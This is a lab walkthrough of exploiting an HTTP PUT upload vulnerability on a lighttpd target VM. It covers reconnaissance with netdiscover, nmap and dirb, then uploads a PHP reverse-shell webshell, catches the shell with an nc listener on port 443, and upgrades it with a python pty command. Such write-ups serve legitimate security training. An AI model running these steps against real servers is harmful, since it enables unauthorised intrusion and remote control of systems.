First introduce the principle of PUT upload vulnerability
Our common middleware are apache, tomcat, IIS, weblogic (actually web container), these middleware can be set to support HTTP methods. Each HTTP method has its corresponding function, in these methods, PUT can directly upload files from the client to the server. If the middleware opens the PUT method in HTTP, the malicious attacker can directly upload the webshell to the corresponding server.
Target machine construction
Link: https://pan.baidu.com/s/1l_LILZgjUZ6ASrFQq9X22A
Extraction code: lsq0
Vulnerability recurrence
- Use netdiscover to discover surviving hosts
netdiscover -i eth0
- Use nmap to detect services and other information on the target aircraft
nmap -sV 192.168.75.158
- Found that the target uses lighttpd middleware
- Use dirb to conduct further information mining on the website
dirb http://192.168.75.158
- Found a directory of test
- Log in to this directory and find that there is no available information
- Use OWASP_ZAP to scan the test website and find that it has a put vulnerability
- Then use the curl command to send a data message to check this vulnerability
- Note: If the scanner cannot see the vulnerability in reality, we must also have this injection idea
curl -v -X OPTIONS http://192.168.75.158/test
Found that PUT is allowed to upload files, and preliminary verification that there is a PUT upload vulnerability
- So we can upload a webshell to this directory
cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/shell.php
- Edit the content of shell.php, I set the port to be monitored here to 443
- Use the poster plug-in of firefox to upload webshell, the old version of firefox only has the poster plug-in
- Fill in the URL http://target machine address/test/ to save the file name, here is rshell.php
- Select the location of shell.php
- Click PUT to upload
- After the upload is successful, open a 443 listening port in kali
nc -nlvp 443
- Click rshell.php, the rebound gave us a shell
- Enter python -c "import pty;pty.spawn('/bin/bash')" to optimize the terminal
- Successfully penetrated the system